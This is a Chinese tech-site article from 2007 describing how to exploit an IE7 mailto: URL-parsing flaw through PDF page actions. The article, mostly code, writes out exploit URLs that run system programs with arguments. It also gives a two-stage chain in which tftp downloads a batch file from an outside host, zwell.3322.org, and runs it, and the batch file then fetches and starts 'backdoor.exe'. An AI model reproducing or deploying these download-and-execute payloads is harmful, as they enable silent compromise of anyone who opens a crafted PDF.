注册本站  论坛  繁體中文

电脑技巧
手机 | MP3 | MP4 | 显卡 | 主板 | 显示器 | 光存储 | 笔记本 | 网络设备 | 移动存储 | 数码相机
键鼠 | CPU | 音箱 | GPS | 电视 | 服务器 | 投影机 | 机箱电源 | 品牌电脑 | 办公打印 |
| 网站首页 | Cisco | Windows | Linux | Java | Dotnet | Oracle | 网页设计 | 平面设计 | 安全 | 软件应用 | 电脑维修 | 办公维修 |
您现在的位置: 电脑技巧 >> Windows >> 系统安全 >> 漏洞补丁 >> Windows正文

关于URL解析漏洞在PDF文档中的利用

文章来源:中国IT实验室收集整理 作者:佚名 更新时间:2007-12-18 0:01:44 【 】 【加入收藏

  右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。

  在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐患的这么一个问题(参看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打开页面的事件刚好可以用来利用。

  Petko Petkov之前放出话说pdf的0day应该也就是指的是这个漏洞了。利用这个漏洞首先需要安装IE7,在URL解析时遇到百分号(%)会执行后面的程序。放出来的利用方式为:

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/calc.exe".cmd

  http:%xx……/……/……/……/……/……/……/……/……/……/……/windows/system32/calc.exe".

  利用这种URL咱们可以执行系统中的任意命令了,但是有一点用处的系统命令都得加参数才能用啊。怎么加入参数呢?反正放在。cmd前就行,但是必须放在引号(")后面,呵呵,其实没的选。经过测试,下面的语句就ok了:

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/net.exe" “user”。cmd

  要有多个参数的话就的

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/xxx.exe" “argv1” “argv2”。cmd

  到这里,基本上大家也就有了利用办法了,网络COPY命令,TFTP等都行啊。不过得分两步:

  1.下载程序

  2.执行程序

  还有一点要注意的,最好在打开页面事件和关闭页面时间中加入上面两步,以免因为网速问题造成程序执行不成功。

  以下是代码片段:

  mailto:test%……\……\……\……\windows\system32\tftp.exe" "-i" "zwell.3322.org"

  "GET" "a.bat" "c:\a".cmd

  mailto:test%……\……\……\……\windows\system32\cmd.exe" "/c c:\a".cmd

  在zwell.3322.org上我搭建了一个TFTP服务器,里面放有一个a.cmd,内容就是再去下载执行一个程序。

  在pdf打开首页时执行第一条指令,下载服务器上的a.bat,保存为a.cmd(为什么是cmd,大家可以思考一下)。

  在离开该页面时,再执行已经下载的a.cmd,其实他是个bat文件,内容是:

  以下是代码片段:

  cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe

  start c:\b.exe

  好了,现在下载了backdoor.exe程序(这只是一个notepad程序,我重命名了)并且执行了。

  • 上一篇Windows:

  • 下一篇Windows:
  • 最 新 热 门
     修改boot.ini 让启动菜单变“彩”
     XP/2003 Server操作系统配置与管理
     黑客又出手 解析新时代的网络攻击技术
     Windows Vista系统服务安全强化策略
     SQL实现其他进制到十进制的转换
     请正确对比Windows和Linux的差异
     60秒就能给Win Vista瘦身2GB
     Vista系统中IE提示证书错误解决方法
     Vista无法正常用输入法的两个解决方法
     深入分析Windows操作系统死机问题
    最 新 推 荐
     安全知识:漏洞的形成和防治
     Windows Vista系统常用补丁功能介绍
     利用极点五笔6.0漏洞 轻松破解Vista
     一个IE浏览器漏洞的安全测试及分析
     Vista SMBv2签名远程代码执行漏洞
     微软年终发布11个bug补丁
     关于URL解析漏洞在PDF文档中的利用
     微软12月发布7个补丁 修复11个安全漏洞
     Windows旧病复发 用户受中间人攻击
     权威统计 FireFox漏洞比IE高数十倍
    相 关 文 章

    安装SQL 2005中的AdventureWorks数据库
    关于服务器你必须知道的几个知识
    关于Windows XP SP3 的问答
    关于windows xp 的开机预读取
    来看看关于 Vista的25个缺点你认同么?
    关于木马病毒的六种启动方式
    关于SQL Server中索引使用及维护简介
    关于ISA防火墙中VPN服务的补充说明(图)
    关于Exchange循环日志和备份
    关于微软Windows Vista的25个缺点

    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告

     

    Copyright 2006-2008 pcjx.com All Rights Reserved
    电脑技巧 版权所有 粤ICP备06059145号 地图
    本网站所有内容未经许可不得转载或做其他使用